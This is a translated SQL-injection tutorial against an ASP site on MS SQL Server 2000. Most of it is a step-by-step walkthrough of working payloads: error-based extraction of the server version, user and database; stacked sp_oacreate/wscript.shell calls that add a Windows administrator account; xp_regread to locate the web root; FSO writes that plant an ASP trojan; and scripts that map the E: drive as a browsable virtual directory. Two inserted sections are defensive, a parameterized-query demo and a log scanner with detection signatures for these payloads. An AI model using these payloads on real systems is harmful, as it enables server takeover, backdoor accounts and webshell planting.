Squeezing the Last Drop Out of MS SQL

xiaoxiao 2021-03-06

In today's ever-changing network, security is something nobody can afford to ignore. When we think of databases we think of the powerful Oracle and MS SQL. Microsoft's product has the most vulnerabilities, so today let's use SQL injection to make MS SQL work for us.

Below, using a well-known website as the test target, I assume everyone has already mastered the basic error-based "blasting" techniques (extracting database, table and column names from error messages), so I won't say much about them here.

Introduction to MS SQL built-in functions:

@@version returns the Windows version and the MS SQL version and patch level.
user_name() returns the user of the current connection.
db_name() returns the currently connected database.
host_name() returns the name of the current host.

This information helps us understand the target system.

Ok, let's get started!

Statement: http://www.xxx.com/list.asp?classid=1'
Returned: Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string ' ORDER BY ID DESC'. /list.asp, line 290
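Behind that error page is a query built by string concatenation. The following is an added example, not code from the original post, that reproduces the pattern in Python with an in-memory SQLite table standing in for the site's MS SQL table, and places the hardened, parameterized version beside it. The table name, its columns and the sample rows are constructed for the demonstration; SQLite's "unrecognized token" error plays the role of SQL Server's "Unclosed quotation mark".

```python
import sqlite3


def make_db():
    """Constructed stand-in for the site's table: a few rows keyed by classid."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE list (id INTEGER PRIMARY KEY, classid INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO list (classid, title) VALUES (?, ?)",
        [(1, "first"), (1, "second"), (2, "other")],
    )
    return conn


def list_unsafe(conn, classid):
    """The vulnerable pattern: the raw request parameter is glued into the SQL text.

    Anything the client sends after the number becomes part of the statement,
    which is why a stray quote reaches the parser and produces an error page.
    """
    sql = "SELECT id, title FROM list WHERE classid=" + classid + " ORDER BY id DESC"
    try:
        return [title for _, title in conn.execute(sql).fetchall()]
    except sqlite3.OperationalError as exc:
        # Equivalent of the OLE DB error the page shows: the parser saw the quote.
        return "ERROR: " + str(exc)


def list_safe(conn, classid):
    """The hardened version: validate the type, then bind the value as a parameter.

    The parameter is transported as data and is never parsed as SQL, so a quote
    or an appended 'and 1=2' cannot change the statement. Non-numeric input is
    rejected outright (returns None) instead of being handed to the database.
    """
    if not classid.isdigit():
        return None
    sql = "SELECT id, title FROM list WHERE classid=? ORDER BY id DESC"
    return [title for _, title in conn.execute(sql, (int(classid),)).fetchall()]


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'", "1 and 1=2"):
        print(repr(value), "unsafe ->", list_unsafe(db, value), "| safe ->", list_safe(db, value))
```

Run it and the unsafe path answers the quote with a parser error and answers "1 and 1=2" with an empty result (the true/false difference the walkthrough relies on), while the safe path returns the same rows for "1" and refuses everything else.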

From the unclosed quotation mark we can determine that SQL injection is present. Having found the vulnerability, we use the functions introduced above:

Statement: http://www.xxx.com/list.asp?classid=1 and 0<>(select @@version)--
Returned: Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)' to a column of data type int. /list.asp, line 290

Relevant information: MS Windows Advanced Server 2000 SP4 and SQL Server 2000 SP3 (the 8.00.760 build shows that MS SQL Server has the SP3 patch). Having looked at the server information, we should find out the privileges of the database connection:

Statement: http://www.xxx.com/list.asp?classid=1 and user_name()='dbo'
Returned: the page returns normally

OK, the permission is dbo. On the surface, connection users with dbo privileges are usually members of the sysadmin server role. Note: members of the sysadmin server role are mapped by default to the dbo user in every database.

The principle is the same as the 1=1 / 1=2 returns. That was only a permission test; let's also extract the value to see:

Statement: http://www.xxx.com/list.asp?classid=1 and 0<>(select user_name())--
Returned: Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'dbo' to a column of data type int. /list.asp, line 290
This shows that the user connecting to the database has high privileges and can be taken to be a member of the server role group.

Statement: http://www.xxx.com/list.asp?classid=1 and 0<>(select db_name())--
Returned: Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'GameImgsys' to a column of data type int. /list.asp, line 290

This extracts the current database. With such a high-privileged database connection we naturally want to get a webshell directly, or even NT Admin. Whether NT Admin can be obtained depends on the configuration of the current server; if the server is configured unreasonably, we can take NT Admin directly. To take NT Admin we use:

MS SQL built-in stored procedures:

sp_OACreate (the damage possible through this one is very large, but sysadmin permission is required to use it), sp_OAGetErrorInfo, sp_OAGetProperty, sp_OAMethod, sp_OASetProperty, sp_OAStop

Since MS SQL can execute multiple statements in one batch, we have the opportunity to use more statements.

Statement: http://www.xxx.com/list.asp?classid=1;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'C:\Winnt\System32\cmd.exe /c net user cntest chinaatest /add'
Returned: the page returns normally. (Tip: if wscript.shell exists on the host, this creates the user cntest on the server.)

After creating the user, add it to the administrators group with net localgroup administrators cntest /add. If the other side has port 3389 open, or IPC is available, nothing more needs to be said.

What do you do when you run into a professionally managed host that only opens port 80? Of course we can still get a webshell and penetrate slowly.

With such high privileges we could first create a table, write the ASP trojan data into it and export it with sp_makewebtask to get a webshell. Doing this by hand is too troublesome, and the biggest problem in uploading a webshell is still finding the web directory. There are now ready-made tools for getting a webshell through backup and through makewebtask, so the recommended approach below is to get the web path first (by reading the registry through a stored procedure):

Use the built-in stored procedure xp_regread (reads a registry key value; permission: public):

Statement: http://www.xxx.com/list.asp?classid=1;create table newtable(id int identity(1,1),paths varchar(500)) declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',@key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\',@value_name='/',values=@test OUTPUT insert into newtable(paths) values(@test)
IIS's default path in the registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\

Read the value from that table using error-based extraction:

Statement: http://www.xxx.com/list.asp?classid=1 and 0<>(select top 1 paths from newtable)--
Returned: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'E:\WWW,,201' to a column of data type int.

This shows the web directory is E:\WWW. Next we use FSO to write the ASP trojan directly (note: sysadmin permission is required to use FSO, and FSO must be enabled):

Statement (shown decoded; in the URL every space is sent as %20): http://www.xxx.com/list.asp?classid=1;declare @o int,@f int,@t int,@ret int exec sp_oacreate 'scripting.filesystemobject',@o out exec sp_oamethod @o,'createtextfile',@f out,'e:\www\test.asp',1 exec @ret=sp_oamethod @f,'writeline',null,'on error resume next'

This creates test.asp under E:\WWW and writes the statement On Error Resume Next into it:

http://www.xxx.com/list.asp?classid=1;declare @o int,@f int,@t int,@ret int exec sp_oacreate 'scripting.filesystemobject',@o out exec sp_oamethod @o,'opentextfile',@f out,'e:\www\test.asp',8 exec @ret=sp_oamethod @f,'writeline',null,'ASP Horse'--
This appends a line to E:\WWW\test.asp containing the record 'ASP Horse'; a complete trojan can be written the same way. (A percent sign must be written as %25.) What if you can't get the web directory? First you have to guess whether the site uses the default web site or a site named after the domain.

declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cscript.exe c:\inetpub\wwroot\mkwebdir.vbs -w "default web site" -v "e","e:\"'

This creates a virtual directory named e in the default web site, pointing to the E: drive.

declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cscript.exe c:\inetpub\wwroot\chaccess.vbs -a w3svc/1/root/e browse'

This gives virtual directory e the browse property. Give yourself a virtual site like this and you no longer have to rack your brains over web directory paths; it really opens your eyes. That concludes our work of using MS SQL to transfer a webshell; the next job should be done by you.
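Every request in this walkthrough is a GET against list.asp whose query string carries the payload, so each one lands in the IIS W3C log. The following is an added example, not from the original post, of the detection logic a defender would run over such logs: it URL-decodes the cs-uri-query field and flags the signatures used above (the stray-quote probe, 0<>(select ...) error-based extraction, the fingerprint functions, stacked statements, the sp_OA* procedures, xp_regread and sp_makewebtask). The log lines are constructed, and the field layout is assumed to be date, time, client IP, method, URI stem, query and status.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not from the original page). In W3C format the
# query string is logged percent-encoded, so fields stay whitespace-separated.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-05-01 10:00:01 10.0.0.5 GET /list.asp classid=1 200
2003-05-01 10:00:07 10.0.0.9 GET /list.asp classid=1' 500
2003-05-01 10:00:12 10.0.0.9 GET /list.asp classid=1%20and%200%3C%3E(select%20@@version)-- 500
2003-05-01 10:00:30 10.0.0.9 GET /list.asp classid=1;declare%20@o%20int%20exec%20sp_oacreate%20'wscript.shell',@o%20out 200
2003-05-01 10:00:45 10.0.0.9 GET /list.asp classid=1;exec%20master..xp_regread%20@rootkey='HKEY_LOCAL_MACHINE' 200
2003-05-01 10:01:00 10.0.0.7 GET /list.asp classid=12 200
"""

# Signatures are matched against each decoded parameter value, not the whole query,
# so the parameter name itself can never trigger a hit.
SIGNATURES = {
    "unclosed-quote-probe": re.compile(r"^\d+'\s*$"),
    "error-based-extraction": re.compile(r"\b0\s*<>\s*\(\s*select\b", re.I),
    "fingerprint-function": re.compile(
        r"@@version|\buser_name\s*\(|\bdb_name\s*\(|\bhost_name\s*\(", re.I),
    "stacked-statement": re.compile(r";\s*(declare|exec(ute)?|create|insert)\b", re.I),
    "ole-automation": re.compile(
        r"\bsp_oa(create|method|getproperty|setproperty|geterrorinfo|stop)\b", re.I),
    "registry-read": re.compile(r"\bxp_regread\b", re.I),
    "webtask-export": re.compile(r"\bsp_makewebtask\b", re.I),
}


def parse_w3c(text):
    """Turn W3C log text into dicts; comment lines (#Fields, #Software) are skipped."""
    rows = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 7:
            continue
        date, time, cip, method, stem, query, status = parts[:7]
        rows.append({"ts": f"{date} {time}", "ip": cip, "method": method,
                     "stem": stem, "query": unquote_plus(query), "status": int(status)})
    return rows


def classify(query):
    """Return the sorted list of signature names that fire on a decoded query string."""
    values = [kv.split("=", 1)[1] if "=" in kv else kv for kv in query.split("&")]
    hits = set()
    for value in values:
        for name, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.add(name)
    return sorted(hits)


def scan(text):
    """Scan a log and return (timestamp, client ip, uri stem, signatures) per suspicious request."""
    findings = []
    for row in parse_w3c(text):
        hits = classify(row["query"])
        if hits:
            findings.append((row["ts"], row["ip"], row["stem"], hits))
    return findings


if __name__ == "__main__":
    for ts, ip, stem, hits in scan(SAMPLE_LOG):
        print(ts, ip, stem, ", ".join(hits))
```

The progression itself is the useful signal: one client IP moving from a quote probe to @@version extraction to stacked sp_oacreate and xp_regread calls within a minute is the whole walkthrough above compressed into four log lines, and the status code is no help because the later batches return 200.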

Please credit the original source when reposting: https://www.9cbs.com/read-86061.html
